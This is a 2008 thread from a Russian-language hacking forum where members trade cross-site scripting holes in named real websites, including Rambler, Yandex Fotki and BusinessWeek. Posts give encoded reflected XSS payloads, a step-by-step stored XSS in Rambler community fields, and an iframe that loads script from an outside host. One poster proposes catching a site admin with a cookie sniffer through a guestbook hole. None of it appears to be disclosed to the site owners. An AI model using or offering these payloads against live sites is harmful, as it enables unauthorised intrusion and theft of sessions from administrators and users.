ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

15.06.2008, 18:24
|
|
Участник форума
Регистрация: 23.05.2007
Сообщений: 143
Провел на форуме: 2252257
Репутация:
627
|
|
Случайно нашел доску объявлений.
Уязвимы все комменты к товарам.
http://stolbik.kiev.ua/b5111492.html
А в поиске сидит пассивка:
_http://stolbik.kiev.ua/search_sp.php?text=%22%3E%3Cscript%3Ealert%28%27XS S+from+Light%27%29%3C%2Fscript%3E&group=0&search_b utt.x=28&search_butt.y=9
Последний раз редактировалось Лайт; 15.06.2008 в 18:28..
|
|
|

15.06.2008, 19:26
|
|
Участник форума
Регистрация: 23.05.2007
Сообщений: 143
Провел на форуме: 2252257
Репутация:
627
|
|
Вот еще: http://www.inox.ua/?check=guest_book<=1213543321953
Уязвимые поля: Имя, www, сообщение.
Частенько админ заглядывает в гостевую и коментит, можно его поймать)))
В поиске тоже сидит пассивка.
__________
Админ прикрыл посты без модерации, но XSS осталось, поэтому когда одмин будет просматривать, его можно накормить снифером...
Последний раз редактировалось Лайт; 16.06.2008 в 05:52..
Причина: админ прикрыл XSS, но не до конца
|
|
|

16.06.2008, 05:45
|
|
Участник форума
Регистрация: 23.05.2007
Сообщений: 143
Провел на форуме: 2252257
Репутация:
627
|
|
Последний раз редактировалось Лайт; 16.06.2008 в 16:07..
Причина: Прикрыли XSS
|
|
|

16.06.2008, 08:15
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме: 305110
Репутация:
133
|
|
хочешь удивиться ? ))) выскакивает alert(document.cookie)
 просто в куках кроме id cессии не чего нет )
|
|
|

16.06.2008, 14:44
|
|
Участник форума
Регистрация: 23.05.2007
Сообщений: 143
Провел на форуме: 2252257
Репутация:
627
|
|
Сообщение от MaSTeR GэN
хочешь удивиться ? ))) выскакивает alert(document.cookie)
 просто в куках кроме id cессии не чего нет )
Пасиба что растолковал, я примерно догадывался, но надо было по точнее узнать.
А вот мой утренний XSS, так сказать за завтраком.
http://www.iemag.ru/articles/detail....08?add-comment
|
|
|

16.06.2008, 15:52
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме: 7229141
Репутация:
3099
|
|
хотелось секаса с девчиной, а получился xss "активный"(с) 
|
|
|

17.06.2008, 00:40
|
|
Участник форума
Регистрация: 23.05.2007
Сообщений: 143
Провел на форуме: 2252257
Репутация:
627
|
|
|
|
|

17.06.2008, 05:12
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме: 7229141
Репутация:
3099
|
|
planeta.rambler.ru
Для теста создал два ака.
Создал в одном сообщество. (вот тут первая хцц)
в названии..
(что то типа бла бла бла //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83 ,83))</SCRIPT>)
мои настройки: премодерация- включена
участвуют все желающие
писатели- участники
читатели -участники сообщества
эксперты- назначает автор тобишь я
===========
Далее. назначаем эксперта нашего сообщества (пока себя самого) - + добавляем экспертные области опять же внедряем свой код
//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83 ,83))</SCRIPT> ( в приципе можно воспользоваться  )
=================
теперь вторым аком заходим в наше сообщество и подаем заявку на вступление
=================
ну и попробуем добавить запись в наше сообщество
олерте
(ЗЫ акк чела должен быть в ваших друзьях)
=================
поиграйтесь с настройками, может я что то упустил
ъхэк!
Последний раз редактировалось xcedz; 17.06.2008 в 05:18..
|
|
|

17.06.2008, 17:32
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме: 305110
Репутация:
133
|
|
businessweek.com
полезно иногда новости читать 
постим коммент к новости
Код:
<iframe src=http://ha.ckers.org/scriptlet.html <
содержание scriptlet.html думаю сами понимаете ))
Код:
<SCRIPT LANGUAGE="JavaScript">alert('XSS')</SCRIPT>
воврашаемся обратно по линку с новостью )) вуаля )
для примера вот news 
http://www.businessweek.com/technology/content/jun2008/tc20080616_034849.htm?chan=technology_technology+i ndex+page_top+stories
P.S вся эта радость работает из за отображения последнего коммента во время поста нового но на странице где отображаються все комменты все нормально фильтруеться )
Последний раз редактировалось MaSTeR GэN; 17.06.2008 в 17:43..
|
|
|

17.06.2008, 17:33
|
|
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме: 2943499
Репутация:
807
|
|
fotki.yandex.ru
уязвимо поле "Альбом". ничего не фильтруется.
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|